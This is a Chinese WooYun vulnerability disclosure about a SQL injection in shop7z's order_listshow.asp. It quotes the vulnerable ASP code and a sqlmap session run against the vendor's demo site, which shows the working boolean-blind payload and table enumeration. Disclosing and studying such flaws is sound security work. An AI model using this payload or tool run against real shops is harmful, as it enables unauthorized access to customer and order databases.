当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076158

漏洞标题:shop7z 订单处注入

相关厂商:shop7z

漏洞作者: ra0mb1er

提交时间:2014-09-16 10:50

修复时间:2014-12-15 10:52

公开时间:2014-12-15 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

order_listshow.asp 文件注入

详细说明:

order_listshow.asp文件 70-75

dim sql4,rs4,id,num,pkid dim sql5,rs5,model,productname,price2,price,money,a,q,allmoney,allnum allmoney=0 allnum=0 sql4="select * from x_bill_product where billid="&request.QueryString("id")&"" set rs4=conn.execute(sql4)

漏洞证明:

order_show.jpg


F:\迅雷下载\sqlmap>python sqlmap.py -u "http://www.shop7z.com/demo/order_listsho
w.asp?id=1" --tables
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20140911}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 18:22:33
[18:22:33] [INFO] testing connection to the target URL
[18:22:34] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[18:22:35] [INFO] target URL is stable
[18:22:35] [INFO] testing if GET parameter 'id' is dynamic
[18:22:35] [WARNING] GET parameter 'id' does not appear dynamic
[18:22:35] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
injectable (possible DBMS: 'Microsoft Access')
[18:22:35] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft Acces
s'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft Access' extending provided level
(1) and risk (1) values? [Y/n]
[18:22:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:22:37] [WARNING] reflective value(s) found and filtering out
[18:22:40] [INFO] testing 'Microsoft Access boolean-based blind - Parameter repl
ace (original value)'
[18:22:41] [INFO] GET parameter 'id' seems to be 'Microsoft Access boolean-based
blind - Parameter replace (original value)' injectable
[18:22:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:22:41] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[18:22:42] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[18:22:43] [INFO] target URL appears to have 9 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[18:22:56] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. '--dbms=mysql')
[18:22:56] [INFO] checking if the injection point on GET parameter 'id' is a fal
se positive
[18:23:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N]
sqlmap identified the following injection points with a total of 65 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: Microsoft Access boolean-based blind - Parameter replace (original va
lue)
Payload: id=IIF(9761=9761,1,1/0)
---
[18:23:26] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[18:23:26] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[18:23:26] [INFO] fetching number of tables for database 'Microsoft_Access_maste
rdb'
[18:23:26] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:23:26] [INFO] retrieved:
[18:23:27] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast'
[18:23:27] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[18:23:27] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q]
[18:23:29] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[18:23:29] [INFO] checking table existence using items from 'F:\????\sqlmap\txt\
common-tables.txt'
[18:23:29] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[18:23:32] [INFO] starting 10 threads
[18:24:00] [INFO] retrieved: article
[18:24:03] [INFO] tried 367/3148 items (12%)
[18:24:03] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[18:24:04] [WARNING] user aborted during table existence check. sqlmap will disp
lay partial output
Database: Microsoft_Access_masterdb
[1 table]
+---------+
| article |
+---------+
[18:24:04] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 408 times
[18:24:04] [INFO] fetched data logged to text files under 'C:\Users\c\.sqlmap\ou
tput\www.shop7z.com'
[*] shutting down at 18:24:04

修复方案:

版权声明:转载请注明来源 ra0mb1er@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝